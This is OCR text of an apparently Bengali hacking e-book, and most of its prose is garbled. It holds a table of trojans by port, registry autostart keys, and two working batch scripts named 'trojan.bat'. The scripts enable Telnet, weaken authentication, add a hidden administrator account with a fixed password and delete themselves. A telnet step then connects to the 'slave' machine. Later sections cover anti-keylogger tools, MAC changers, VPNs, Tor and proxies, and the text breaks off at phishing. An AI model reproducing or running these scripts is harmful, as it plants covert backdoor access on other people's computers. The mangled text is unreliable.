80            711 trojan (Seven Eleven), AckCmd, Back End, Back Orifice 2000 Plug-Ins, Cafeini, CGI Backdoor, Executor, God Message, God Message Creator, Hooker, IISworm, MTX, NCX, Reverse WWW Tunnel Backdoor, RingZero, Seeker, WAN Remote, Web Server CT, WebDownloader
81            RemoConChubo
99            Hidden Port, NCX
110           ProMail trojan
113           Invisible Identd Deamon, Kazimas
119           Happy99
121           Attack Bot, God Message, JammerKillah
123           Net Controller
133           Farnaz
137           Chode
137 (UDP)     Msinit
138           Chode
139           Chode, God Message worm, Msinit, Netlog, Network, Qaz
142           NetTaxi
146           Inferior
146 (UDP)     Inferior
170           A-trojan
334           Backage
411           Backage
420           Breach, Incognito
451           TCP Wrappers trojan
455           Fatal Connections
456           Hackers Paradise
513           Hackers Paradise
555           RPC Backdoor
605           Net666, Rasmin
666           711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy
667           Secret Service
669           Attack FTP, Back Construction, BLA trojan, Cain & Abel, NokNok, Satans Back Door - SBD, ServU, Shadow Phyre, th3rlpp3rz (=Therippers)
692           SniperNet
777           DP trojan
808           GayOL


911           AimSpy, Undetected
999           WinHole
1000          Dark Shadow
1001          Deep Throat, Foreplay, WinSatan
1010          Der Spaher / Der Spaeher, Direct Connection
1011          Der Spaher / Der Spaeher, Le Guardien, Silencer, WebEx
1012          Doly Trojan
1015          Doly Trojan
1016          Doly Trojan
1020          Doly Trojan
1024          Doly Trojan
1025          Vampire
1025 (UDP)    Jade, Latinus, NetSpy
1035          Remote Storm
1042          Remote Storm
1045          Multidropper
1049          BLA trojan
1050          Rasmin
1053          /sbin/initd
1054          MiniCommand
1080          The Thief
1081          AckCmd
1082          WinHole
1083          WinHole
1090          WinHole


1095          WinHole
1097          Xtreme
1098          Remote Administration Tool - RAT
1099          Remote Administration Tool - RAT
1150          Remote Administration Tool - RAT
1151          Blood Fest Evolution, Remote Administration Tool - RAT
1170          Orion
1200 (UDP)    Orion
1201 (UDP)    Psyber Stream Server - PSS, Streaming Audio Server, Voice
1207          NoBackO
1208          NoBackO
1212          SoftWAR
1234          Inferior
1243          Kaos
1245          SubSeven Java client, Ultors Trojan
1255          BackDoor-G, SubSeven, SubSeven Apocalypse, Tiles
1256          VooDoo Doll
1269          Scarab
1272          Project nEXT
1313          Matrix
1338          The Matrix
1349          The Matrix
1394          Millenium Worm
1441          Bo dll
1492          GoFriller, Backdoor G-1


1524          Remote Storm
1568          FTP99CMP
1600          Trinoo
1703          Remote Hack
1777          Direct Connection, Shivka-Burka
1807          Exploiter
1966          Scarab
1967          SpySender
1969          Fake FTP
1981          WM FTP Server
1999          OpC BO
2000          £Bowl, Shockrave
2001          Back Door, SubSeven, TransScout
2023          Der Spaher / Der Spaeher, Insane Network, Last 2000, Remote Explorer 2000, Senna Spy Trojan Generator
2080          Der Spaher / Der Spaeher, Trojan Cow
2115          Ripper Pro
2130 (UDP)    WinHole
2140          Bugs
2140 (UDP)    Mini Backlash
2155          TheInvasor
2255          Deep Throat, Foreplay
2283          Illusion Mailer
2300          Nirvana
2311          HvIRAT
2330          Xplorer


2331          Studio 54
2332          Contact
2333          Contact
2334          Contact
2335          Contact
2336          Contact
2337          Contact
2338          Contact
2339          Contact, Voice Spy
2339 (UDP)    Contact
2345          Contact, Voice Spy
2565          Voice Spy
2583          Doly Trojan
2600          Striker trojan
2716          WinCrash
2773          Digital RootBeer
2774          The Prayer
2801          SubSeven, SubSeven 2.1 Gold
2989 (UDP)    SubSeven, SubSeven 2.1 Gold
3000          Phineas Phucker
3024          Phineas Phucker
3031          Remote Shut
3128          WinCrash
3129          Microspy
3150          Reverse WWW Tunnel Backdoor, RingZero


3150 (UDP)    Masters Paradise
3456          TheInvasor
3459          Deep Throat, Foreplay, Mini Backlash
3700          Terror trojan
3777          Eclipse 2000, Sanctuary
3791          Portal of Doom
3801          PsychWard
4000          Total Solar Eclypse
4092          Total Solar Eclypse
4242          SkyDance
4321          WinCrash
4444          Virtual Hacking Machine - VHM
4567          BoBo
4590          Prosiak, Swift Remote
4950          File Nail
5000          ICQ Trojan
5001          ICQ Trogen (Lm)
5002          Back Door Setup, Blazer5, Bubbel, ICKiller, Raid, Sockets des Troie
5010          Back Door Setup, Sockets des Troie
5011          cd00r, Shaft
5025          Solo
5031          One of the Last Trojans - OOTLT, One of the Last Trojans - OOTLT, modified
5032          WM Remote KeyLogger
5321          Net Metropolitan
5333          Net Metropolitan


5343          Firehotcker
5400          Backage, NetDemon
5401          wCrat - WC Remote Administration Tool
5402          Back Construction, Blade Runner
5512          Back Construction, Blade Runner
5534          Back Construction, Blade Runner
5550          Illusion Mailer
5555          Xtcp
5556          ServeMe
5557          BO Facil
5569          BO Facil
5637          Robo-Hack
5638          PC Crasher
5742          PC Crasher
5760          WinCrash
5880          Portmap Remote Root Linux Exploit
5882          Y3KRAT
5882          Y3KRAT
5882 (UDP)    Y3KRAT
5888          Y3KRAT
5889          Y3KRAT
5889          Y3KRAT
6000          The Thing
6000          Bad Blood
6000          Secret Service


^yrf%° f¥p Pkvjw ^w\ <p$\$ 
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6000 

The Thing 

6661 

TEMan, Weia-Meia 

6666 

Dark Connection Inside, NetBusworm 

6667 

Dark FTP, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8, Trinity, WinSatan 

6669 

Host Control, Vampire 

6670 

BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame 

6711 

BackDoor-G, SubSeven, VP Killer 

6710 

Funny trojan, SubSeven 

6713 

SubSeven 

6723 

M stream 

6771 

Deep Throat, Foreplay 

6776 

2000 Cracks, BackDoor-G, SubSeven, VP Killer 

6838 (UDP) 

M stream 

6883 

Delta Source DarkStar (??) 

6912 

Shit Heep 

6939 

Indoctrination 

6969 

GateCrasher, IRC 3, Net Controller, Priority 

6970 

GateCrasher 

7000 

Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold 

7001 

Freak88, Freak2k 

7215 

SubSeven, SubSeven 2.1 Gold 

7300 

NetMonitor 

7301 

NetMonitor 

7306 

NetMonitor 

7307 

NetMonitor 
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7308 

NetMonitor 

7424 

Host Control 

7424 (UDP) 

Host Control 

7597 

Qaz 

7626 

Glacier 

7777 

God Message,Tini 

7789 

Back Door Setup, ICKiller 

7891 

The ReVeNgEr 

7983 

M stream 

8080 

Brown Orifice, RemoConChubo, Reverse WWW Tunnel Backdoor, RingZero 

8787 

Back Orifice 2000 

8988 

BacHack 

8989 

Rcon, Recon, Xcon 

9000 

Netministrator 

9325 (UDP) 

M stream 

9400 

InCommand 

9872 

Portal of Doom 

9873 

Portal of Doom 

9874 

Portal of Doom 

9875 

Portal of Doom 

9876 

Cyber Attacker, Rux 

9878 

TransScout 

9989 

Ini-Killer 

9999 

The Prayer 

10000 

OpwinTRojan 
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10005 

OpwinTRojan 

10067 

(UDP) 

OpwinTRojan 

10085 

Syphillis 

10086 

Syphillis 

10100 

Control Total, Gift trojan 

10101 

BrainSpy, Silencer 

10167 

(UDP) 

Portal of Doom 

10520 

Acid Shivers 

10528 

Host Control 

10607 

Coma 

10666 

(UDP) 

Ambush 

11000 

Senna Spy Trojan Generator 

11050 

Host Control 

11051 

Host Control 

11223 

Progenic trojan, Secret Agent 

12076 

Gjamer 

12345 

Hack'99 KeyLogger 

12346 

Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp client.c, icmp pipe.c, Mypic, NetBus, NetBus Toy, NetBus worm, Pie Bill Gates, Whackjob, X-bill

12349 

Fat Bitch trojan, GabanBus, NetBus, X-bill 

12361 

BioNet 

12362 

Whack-a-mole 

12363 

Whack-a-mole 

12623 

Whack-a-mole 
(UDP)


12624 

DUN Control 

12631 

ButtMan

12754 

Whackjob 

13000 

Mstream

13010 

Senna Spy Trojan Generator, Senna Spy Trojan Generator 

13013 

Hacker Brasil - HBR 

13014 

PsychWard 

13223 

PsychWard 

13473 

Hack'99 KeyLogger 

14500 

Chupacabra 

14501 

PC Invader 

14502 

PC Invader 

14503 

PC Invader 

15000 

PC Invader 

15092 

NetDemon 

15104 

Host Control 

15382 

Mstream

15858 

SubZero 

16484 

CDK 

16660 

Mosucker 

16772 

Stacheldraht

16959 

ICQ Revenge 

16969 

SubSeven, Subseven 2.1.4 DefCon 8 

17166 

Priority 
17300

Mosaic 

17449 

Kuang2 the virus 

17500 

Kid Terror 

17569 

CrazzyNet 

17593 

CrazzyNet 

17777 

Inferior 

18753 

(UDP) 

Audiodoor 

19864 

Nephron 

20000 

ICQ Revenge 

20001 

Millenium 

20002 

Millenium, Millenium (Lm) 

20005 

AcidkoR 

20023 

Mosucker 

20034 

NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whackjob 

20203 

Chupacabra 

20331 

BLA trojan 

20432 

Shaft 

20433 

(UDP) 

Shaft 

21544 

GirlFriend, Kid Terror 

21554 

Exploiter, Kid Terror, Schwindler, Winsp00fer

22222 

Donald Dick, Prosiak, Ruler, RUXTheTIc.K 

23005 

NetTrash 

23006 

NetTrash 

23023 

Logged 
23030

Amanda 

23432 

Asylum 

23456 

Evil FTP, Ugly FTP, Whackjob 

23476 

Donald Dick 

23476 

(UDP) 

Donald Dick 

23477 

Donald Dick 

23777 

InetSpy 

24000 

Inferior 

25685 

Moonpie 

25686 

Moonpie 

25982 

Moonpie 

26274 

(UDP) 

Delta Source 

26681 

Voice Spy 

27374 

Bad Blood, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven 2.1.4 DefCon 8, SubSeven Muie, Ttfloader

27444 

(UDP) 

Trinoo 

27573 

SubSeven 

27665 

Trinoo 

28678 

Exploiter 

29104 

NetTrojan 

29363 

ovasOn 

29891 

The Unexplained 

30000 

Inferior 

30001 

Err0r32
30003

Lamers Death 

30029 

AOL trojan 

30100 

NetSphere 

30101 

NetSphere 

30102 

NetSphere 

30103 

NetSphere 

30103 

(UDP) 

NetSphere 

30133 

NetSphere 

30303 

Sockets desTroie 

30947 

Intruse 

30999 

Trinoo 

31335 

Bo Whack, Butt Funnel 

31336 

Back Fire, Back Orifice 1.20 patches, Back Orifice (Lm), Back Orifice russian, Baron Night, Beeone, BO client, BO Facil, BO spy, BO2, cron / crontab, Freak88, Freak2k, icmp pipe.c, Sockdmini

31337 

Back Orifice, Deep BO 

31337 

(UDP) 

Back Orifice, Butt Funnel, NetSpy (DK) 

31338 

BOWhack 

31338 

(UDP) 

Hack a Tack 

31787 

Hack a Tack 

31788 

Hack a Tack 

31789 

(UDP) 

Hack a Tack 

31790 

Hack a Tack 

31791 

(UDP) 

Hack a Tack 
31792

Hack a Tack 

32001 

Donald Dick 

32100 

Peanut Brittle, Project nEXT 

32418 

Acid Battery 

33270 

Trinity 

33333 

Blakharaz, Prosiak 

33577 

Son of PsychWard 

33777 

Son of PsychWard 

33911 

Spirit 2000, Spirit 2001 

34324 

Big Gluck, TN 

34444 

Donald Dick 

34555 

(UDP) 

Trinoo (for Windows) 

35555 

(UDP) 

Trinoo (for Windows) 

37237 

Mantis 

37651 

Yet Another Trojan - YAT 

40412 

The Spy 

40421 

Agent 40421, Masters Paradise

40422 

Masters Paradise 

40423 

Masters Paradise 

40425 

Masters Paradise 

40426 

Masters Paradise 

41337 

Storm 

41666 

Remote Boot Tool - RBT, Remote Boot Tool - RBT 

44444 

Prosiak 
44575

Exploiter 

47262 

(UDP) 

Delta Source 

49301 

OnLine KeyLogger 

50130 

Enterprise 

50505 

Sockets desTroie

50766 

Fore, Schwindler 

51966 

Cafeini 

52317 

Acid Battery 

53001 

Remote Windows Shutdown - RWS 

54283 

SubSeven, SubSeven 2.1 Gold 

54320 

Back Orifice 2000 

54321 

Back Orifice 2000, School Bus 

55165 

File Manager trojan, File Manager trojan, WM Trojan Generator 

55166 

WM Trojan Generator 

57341 

NetRaider 

58339 

Butt Funnel 

60000 

Deep Throat, Foreplay, Sockets desTroie 

60001 

Trinity 

60068 

Xzip 6000068 

60411 

Connection 

61348 

Bunker - Hill 

61466 

TeleCommando

61603 

Bunker - Hill 

63485 

Bunker - Hill 

64101 

Taskman 
65000

Devil, Sockets desTroie, Stacheldraht

65390

Eclypse

65421

Jade

65432

The Traitor (=th3tr41t0r)

65432

(UDP)

The Traitor (=th3tr41t0r)

65534

/sbin/initd

65535

RC1 trojan



8) am tarn aw w my a^r acmrc'fi m area PID wiw i atr stw Process ID I ca cait &r faw caw catw cait mw a?y 
PID m a^?p i am Windows Task Manager m a^r a^x Services tw It (ns ^ a^r f%m f&m aya I arcaw 

Hitfi'Cvs cam PID a<r aw fafm ca*p am aia 3 a<y aaw [ description ] I aw St taw cam wrfam area' faw m afa w fafm 
aifa orrafa (S'i^ym wiifm © 


^yif%° f*r^a faww aaa a>aw ^rcaw aaTw w 
Name               PID   Description
osppsvc            6064  Office Software Protection Platf...
WSearch            3243  Windows Search
upnphost           2156  UPnP Device Host
SSDPSRV            2156  SSDP Discovery
FontCache          2156  Windows Font Cache Service
SysMain            1696  Superfetch
StiSvc             1676  Windows Image Acquisition (WI...
LicCtrlService     1616  LicCtrl Service
AdobeARMservice    1560  Adobe Acrobat Update Service
MpsSvc             1476  Windows Firewall
DPS                1476  Diagnostic Policy Service
BFE                1476  Base Filtering Engine
Spooler            1428  Print Spooler
TapiSrv            1268  Telephony
NlaSvc             1268  Network Location Awareness
LanmanWorkstation  1268  Workstation

CPU Usage: 0%
Physical Memory: 65%


wtv 3 or# cs##? iR m ^rr\3 ri<r c£rr w&m f#r or# i ^ <5 rr ^ auto - startup otftt R#vd i ortf^ 
' 3 r s i«T w $ 3 \\3 \ 3 gr w : w i or# rRtR? gw ^ (Wvs rr«t rr cwt cststr #t? ott jr wr i 3# 
(.fifoR? gs (?Rv 3 fr vsrr ^rrf h#& g*w Regedit Rr^t 3#^ fr^t 1 or# Rrf or&t ^r iR #R%f% Rw RRr 1 or 5 # -*jR 
r orfw, vstw aiv3i4fE IwSfii css gw Trojan.exe ^r trojan.exe riw gtr chtstr orr Rrt i ^nwr 


(W <pflCv 3 FR wWR 
RK« afl^T SIT'pT ®13iK STTaqg I 

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] 

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] 

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] 




b) oil'll srfpra ^‘•histf -sniFbeiRfii^ 

}) sm1% ’’'nt'SW 
o) 3mf% PbPr \3?HTW 
8) isfefS- It^rm 

4 ) -oijivb s < t“lfl 

o) ” 5 iTPr it^ora 


^Y#° f¥j«T RrW <RTf oR®TR <r><q|<q 3 RT «R 
I R>*IW <Sl3iH I

1 I 

! ! 

| orrPr 5 J 5 Wi 3to cSrsiH ^mtcrt Prto fto i 3<y wy ^ 3tr Catos' i 

I | 

| $$'MjT>si a5[pr 3?r wr cSmH 4Hiio 5pr notepad am 4 <j«t j<r orto Pns?r ms Sr 4pr 4?p 3 <r (wm ^rpr Pt?r .bat JsrtSmw Pww | 
| PTo 4<p I 

I I 

I I 

@echo off
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user tunerpage /add
net user tunerpage 12345
net localgroup administrators tunerpage /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v tunerpage /t REG_DWORD /d 00
del trojan.bat

I I 

1 ^ 1 

I 3W (W (&W 3 I 

I c ii?®i St c 2 w to < \% ftw i 

1 1 

I «tt$®t Sr atoifi ^trterr a?y ^ w fxeS^ cf wr Telnet server (¥ to i I 

I I 

I \2>?r tor St fneS^ current windows NT systems a?y Telnet server cf to wr i I 

1 1 

18 af *rit^ St aW' 3 ?n^ .a?r NTLM hash security 14 <rar 4 t?r pit<r i 

I 45T St Telnet server 34 stream mode 4314 <s nwr ’JW 4 tti4 i 

T T 

| v3 s^r «tt$®t ^tSt tunerpage ^tor?r tef?r arosto 12345 I 

w «n^®r It tunerpage mm SS'tfi'dto Administrator tor?r to i 
| w tor It tunerpage aa^r ttoa a?y wi ^tSt ^fto i 
| so^r «TTt®r It ^fii ^yfS to c-^ c i(. < i i 

L _ _ . _ , . „ ! 

| Stol^ S 3° (vb^lfl SPRy (SrSTT°T <H®iKvs Pl(.b?l C^TvS - Si <Kfl (®rtayTv5T 3 C^Pt 3^° =TPT ltl?T .bat 3$lCb t ^IM folta C^Tvs <l>fj^l I I 

I I 

@echo off
pkgmgr /iu:“TelnetClient”
pkgmgr /iu:“TelnetServer”
sc config tlntsvr start=auto
sc start tlntsvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user tunerpage /add
net user tunerpage 12345
net localgroup administrators tunerpage /add
reg /add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v tunerpage /t REG_DWORD /d 00

i i 

1 „ I 

5t?r (5 tft cStw IS a Rc- 5YC4 4t^ ps^tpt Telnet Client sim wc4ihi (ait4 Pits^ (41^ wtw 

i i 

| 4H5Bifi a srnw 4ato aram i ^ slave’s IP address sn?m co so srm srft pr pp# 4m 5t4 ^ 

I I 

i i 

C:\>telnet <slave’s IP address>

I I 

| st^t : Sr ^ srrt^r w i^tr i jSr (wm *iwt *nt^ q 

| ^Pr , ,a$ mi?r ^rt i oinf% 4wrw ^t»r 3Sr 4 ?tio fpt w ^ fro 

| 4fK4<H I OPTTC4 (4HolW^ 4WT ^ «TT ^ 


^yrf%° fr^r ^w\ <p$\$ ^fy ^ 
| (fllbl^jb R*T Pk^ R^llflvs ^C'llb^l I oTPTT ^ffT ^TFMTWT °Tv^T f*R{v!F


f*r^jr IPc^u^ ~3W\ ^fiifi orc^w ^P) <p$\$ ^ 




www.BanglaEbookDownload.com | 


^ 8 : , f^rer <34x ot : t%v9t RPb\s4fi«r i 

* 

^TTf4° ^44774 bi®^ 5 or[4 4it bi<^ 9 ^prPr ^rrf%° <K44 or[4 4fl <K44 , 1447437 01744774 44 f444 otk^t RPbvs ^ficvs 374 i } 



l 

l 

<3I?T (4lbl4 fb 3pf sp' fw ($174 x3&T44v3t <34T?T (bfl$4 gfflRhvs 4\!>Y (4 oh c 1I$«1 <3 (4vSj ^ C<M®HPi«H boo % f^T^T^TF <34° Wpf (474*51:^1 <1^1^ f%4 , f 

p 

; 4174 14^47 SJI<K4 ! 4474 ^ (474 47 (474 ^%aT SJI4W I R 5 ^ \!>T4 4774" <3?" 47 (4 (4©" ^ >jfl(4v3 4T ! 4T4T41 <34|> (4474 47474^ <34° | 

o]|4*IT<?l4 Hvs'^vsl oJ 4444 4474 oTPTft *j4 44(3^ <?T (W 44744 oT4T4I'Na 3 <34^ f^T^T^W ^Tf4 4<J4 (4(47(41 WITT (4T4Tf44T 447(3 «4f I orrf4 f 
oTf^T ^1TW» f473T4 gf\ 2 )fP$| W fWf(4 <3(4<Kfl f#{v9 4(4 \g4T\s 474744 FT 4TT47(4 f4Wf4\s ol|(4b41 444 '§ 



TJjTvst 44 <•$ tW43T ^44744 I b) o 1V1|34 fWlsT *) 01441^4 f44TW 


b) ^44^4 f44T43T 


27^(4? voJHfll oj|(. c llb4l 444 ; 4441?4’ 144144 f47?T ©4^TK4T ^4774 ^4 c 1l?®i <34 f44T44 RPbvs 44T 474 I 4T°4T (S’ 4474 4S74 <3474 447 oTf74 ” | 
f4W4 (W (?# (4 4TW44 474 3l%T4T4 4447 (474474 414 ” 47f%^ <34 £4743 4lf%44 f4\ 47 I H(<f 144 457 44 474 447S 47 x 344 474 | 
fW t4P^T <34 144744 f$4 ^74 447 I 44444 474 474744' o744l$4 <34 4|S(4 44747 f44T4 44744 47 I oTFI4TT4 , <34 <34 <34 , (44^4 | 
<35J74W OUTS' 474x3 oJT4T4 o7T4474 f47^4 (4 3TT4 447S 444 I Sit 44444 14474374 447 6 t 47474 474744 I oT44lt4 1447437 <S oTR4T o7R47b4T | 
444 f4o774 o7T4f4 St4T4 , (£SW , # 4474 , ?j£ f%£ ts#i (474 4TSTS 414744 I | 
p ft - piff : p

\ I 

I I 

ft - ^TT?r frsiw sprt omf% ft- ft snw i 3$p tt ft ($\£ 3?r aPsfS c^ff cf iw ^r 3 ^^ I 

| i 

1 ^ ft - *ipfc (^ 1 I 

I I 

^ I 

ft c^ff &vmifi ft ^ *rr vsft fw ff^T ^ c 9 ^ orftt ft ciw ^ “KeyScrambler" I KeyScrambler 

| ^flf o^v3 3THIF3 3^X vbTSHWTvb 3^ %3T | 


t ft (ns ^ O 5 ^ vsUFTT 

| 

1 1 


sm 1 % ft- *r 5 r[?r 5 ^: NextGen AntiKeylogger I NextGen AntiKeylogger ft os <f?tc« fl<F <F<p \ 


I WF3?ITW C 9 ^ <llbCvs ! I 

I I 

1 _ | 

| wrx 3 ?m^ c 9 ^ ffevs ncf fpt ^ Malwarebytes ’ Anti-Malware I 3 $r ww vsptt omf% 3 frr | 

| m^FT Pnfsr cw WTv3?mw ^ ^ m ^ \st ^ 1 Malwarebytes Corporation 3 <t telW 3 $ ^mf% wrv3?mw v3?mw | 

sp^Ttf olTW\3 vb'iMCvs 3 ^° vblS^iC'llvb <Pfl (.\3 ^PTf% olMvs ^TK^T 33 " ^(f Pl^FT C 9 !^ I (FT^TFT C 9 ^ oTFTpT ft , C3T , f%=T | 

| vetsPt vbTS'H'MTvb ^ <wifi ^tt^t i Malwarebytes’ Anti-Malware 3 ^ orfffwr v 3 WHi$S 3 cw 3 ^ vbiS'HWvb fw^ | 
I 3t Pm i | 


I :j pT?nW\3?rFT ^?FT ! | 

1 I 

p c^Pra^r (srot (pr^n m ^prar 3 <t ^rrl^ite ^Pr ^f?r i 3^ ^rw fw ^rr ^pw f 

| ^ITOt C 9 ^ W* I S$'06W 3<T WT^'3?TFT 3PT 3^fl fw I oTRW Cn^TPPT feflTT S$06W 3^ Pm VfFM'3FTFT C^ft | 

| 3 f&r ^rr i ^ fw PiKb'Hi ^w\ ^ oHTv 3 ?n^ cf&T 3 ^ f^pvs COMODO firewall't wr^ c 9 ^ c^t W^ft | 

i COMODO firewall vbl' 5 ®iC c 1 lvb ^flCvs t?M> 3 lU@HLJ_ 


^Ylff° Pr^JT Pk^iC^ ~3W\ ^fllfl oTC^fW ^[v3 ^fllfl ^fT 


I R#TO 3R^ TOTCRfi^ Hf$R (R RTTO !

I 1 

1 

1 - _ ^ ^ _ I 

| -*o|^ci 3R° ^TRl(.fl(b° f^F^T (R RTSTFi) 3<Pb|? Wfe oTTR \sT HrR 3Rfe' 5 T 5 TR R>RT I \3FTRFTT^ HjRT 3RRf 5 T*TR Rt^KR TrUcCvypt \ 

| RR C^KR oTCRT I 3I^T v3lWTPf \3# 3R RF^PS RTRTT HlFs RTRIRR TOlfR I vblSRCRKb RRR\3 Hr R?jR 35 I 


I 3R^ 3^#riw HfR cr rtrtrr ourrr crr rtsw : I 

I I 

i i 

I _ . _ I 

Deep Freeze !!! fSr , DeepFreeze tortr HtHt cr Ri&qft tortw riRc^ w ! 3frr HtHt 3R ^QRmto RRfRTORR £tcr fe^r to rtcr i 

I vcta»f\9(\9 rHt rto rh ^hi4tNa9 crtr RfRRvsR rtS tortr rtcrr HrHr c\s t^jr 3frr rr hwR HtHt (\s fR- (Sr to crt m rjtftrt wit 1 
| ^ 'I 

| 3r&t fR<p 3R w 1 DeepFreeze w*^4 tor tofs fS^RTR cro 3R rt£ rti^r 3r to?t Htr ! DeepFreeze rtos Hr Rip | 

I 3t I I 


vsR^RTR (RHr RYRRTR R^R! 

^il(<K ^(fl^Rfl 3 Rn 3R Wf I 

RTRRTR RffR vsT^RR CRpTR I 3Fs TO WI 


3^ ^JRT RR RTfe HFd FTR RF5T1RT \gR R TO vdT 3R3RTR RPbvs $ ! 3$ \gR ^RT ‘ S JRTRR ^TRTl j 

vgR TO3 3Rfr TOTT RTtR ?RRR 3R RTTOTT ^R R^Jff (RplR STRl ! ^RTR (RplR fTOlR 


VMWare Player ^ 3r£t rrt^rtr i VMWare Player r^rr w Hr R<|R 35 Pir 


| RTOR RfRRR RfRTR RT*[R TORTR RTTR (R ! | 

I I 

I # § 

I RFRR RftpT R RT^lf% ^ (5® RR C^^RT PiR RR^T RRpT R 4|5 r , fw RRpT f% RFR R[tPf 3<T W ^TR ( MAC - Media | 

| Access Control) rtotr^ rtrt tw to ^r 3r ! Network Interface Card (NIC) 3?r s^srrr w rw| 

RT 5 T®TR ^ITR I 3b|R RT 5 Tf% RR«T V3^jf% R^T RT^RR ^(flb^ (R^R <M|fl ^^(vs R 2 /^" ^R I Rl^Pr CS"^ ^Rf ST RRT f 

I i I 

| otr% ! ^tr c^ w Technitiuni MAC Address Changer ^r TMAC I TMAC rS^ri^ w Hr r^jt 3^ | 

L ! 


CCleaner rr^r r^t 


f CCleaner sr r^ rtrr RTfe 
| Hr r^r 3 ^ Hrr i 


©RRRTfR rHr , RRT tRJva RRT CRR TO RTOT Rl^T RRR TO CCleaner I CCleaner vb lSHRTvb RRR | 


I ^ tR^ r^r : I 

I I 

I I 

I RTRHt RRs (R^JRR RTRRR RT^RR 3R flR U^lfl RRR I 1RW R 56 ^ RETT'S ^fR RIR CR^JRT RfRFTT ^R fRC^TCR oIRT fRRTRR RiRRT Cs (Rs RCR 

| ( | 

p rir ! 3^ rto (giro <$r fR^ rrtr to TORTR 3RW Flash Cookie Remover I Flash Cookie Remover vbiSRRTvb rrf» \ 

I __ I 

I Hr rrr 3r » i I 

* ^ * 






PraTW 


SYlfR” f*T^R fRRiR R^Tf RRTR ^RT oTXRTR RRTR ^RT RR 


VPN (Virtual Private Network):

| 1 

I 3 4441(4 S?(4t4f\54T (vs Rtm 34tr ^4(4 i \3tr 44(^3 ft§(4 Hf4 444 3t i I 

I : 

| \s(4 Wi OT 34 44T4 44(vs (4(4 V/W ^j4fw 34tT 4*ifosl W ft(4 ^4T44T4 ^TflPr ^4(4 (TOT v3(4<HI$E 34 47^14 34 4T(4 ^4T44T(4 | 

| 4X43^ 4(4 (44 oHi 34bl f%W olf§f4 C^irSlfl 41474 | I 

• 

I 1 

I Rwpw VPN ?j(4T4 vblS'4(4Tvb f4¥ RlS" ftK I ^ 414<>[(4T(v3 f44 44(4t 3^ VPN 34 4*4f¥v3 v4fVpl'4M 3(44(431 It 3(44 3(4 47(4 ^ p 

I I 

I I 

1 

• Cyberghost
• HotSpot Shield
• Pro XPN
• Open VPN


I oTT4 tl47 m (4®1I RiPlC^ 41 5 f4T I tl4l Pi(^ (4®1(V3 34 344 f^^VPN Si 4 Pl3> Pl(b Pi^H I 

| 

• nVPN


I fer^nr 


SwissVPN 


aivS'b'iifi 4^jr 


| sfr$m 34444 (44 fa?r 4W Tor Browser I 3tr wror 34 4\s <j>f% (4s 444 <m 47 , 331(41414 sat ws <yi4(vb7fi 47 i 3tr | 

p 

tw (4(4^ ^\3f4 4^413(4(4 I Tor vblS'HWvb 44Kv3 34 ^ifefw 3(44H1$E (4(4^ ^(4 fW f^4 4(4 



3Tlf4° f¥}4 Pu^U^P 444 44T4 ^i4T 4(44 4>P) 4414 44T 44 
HTTP Proxies and SOCKS5:

i I 

I _ j 

HTTP Proxies and SOCKS5 R^iRvs a^° Rim aa>t?T Rto - i vsR-qitvs a^t war<R rtR R^iRvs a^ aa^r Ib3«i | 

| I vsR 5RRTT W , ^fl1^v3, RR*E a^R ^sifjvs aa^ Plow a?T W OT 1 TRR v3 Rmf5'(4k Tf^R W aa^RRR ^ROlk afiRR | 

I I 

p ^ SOCKS SOCKet Secure I aR wkfS a^ r\R?t a?r c^sr ^ra^r a-Rm rir ^ I SOCKet Secure a?r « vst gw a?r 1 

I mm | 

| gsvsr a^R SOCKS5 I HTTP Proxie 3 RiR^fE a^x wrr ^^rifR i app Rvir a^R fw rrrt i 

| | 

HTTP Proxies and SOCKS5 a<T Ra? RR[R a^R RvsSjRT \3RRRtl? aR R^ Res' (h«1H I | 

• Alive Proxy 

• Hide My Ass 

• Proxy list 


$ RR\3 aR hfWfl avbt'l GsT ^jJR w asst 1 


p R^ aRr \3i?Rait& aR f5<^Mi \3 Rir Rrr ©a^R rr 3> v3RWft& rtcr rt 3Rvd rtrrtr spt rrrt rrRr rtr rir , oti ifjjw p 
| Rw rRer ( RitR) Rw at ^r aRr rt^ to rrss aRR Rfw i 

1 | 



SttRx fr^T RRR w OTT RR RwM, 4 > w w 


rR° R^t r^itt ^rr rrr rR rrr rr 
<tnPi+ snfo <t : f%pR nw -mm'SIjj *p«nfiS snfewr Raite® i

I 

arromm a# oprar ^mfcrnmr mmm ftfax fmt?F i car mm wr mim 0 

P <K <K<K 



§ srw 5% fipfirt fw ? 

9 — . 

, 

I 

| PopR ’'FT ']C c i c i 1% aFTOf <3 TOa# R>^5 vb'i|(.®H«H =TT 3 TO fl mX^TTCm^TO (bS® 1 lfl CTO 3 *$<t (m*ff 3<t>bf (ml ! aTmam \3 oPJT (pfpT aFTfm 

aUamiC'isl m\°>m f% Pi (a ailfl aji^u^fl (bS°i <3 , ^l°(.flP'i am ^7^1^ , v^Tm 'STT^T^T m ^a PopF^ m (®1 mim mm S^Pp^ ^>1(311 f% all ? mT ! 

| mTmFCm3 PlTO W ^1W my<$TCfl (aT oPFPT aim W am a#TO S^TOF mm ftpT“ 

| PyPr 3i?r mimim ” PHISHING” I ^froa fw # mm rni^r w c^(^ 

1 
I 

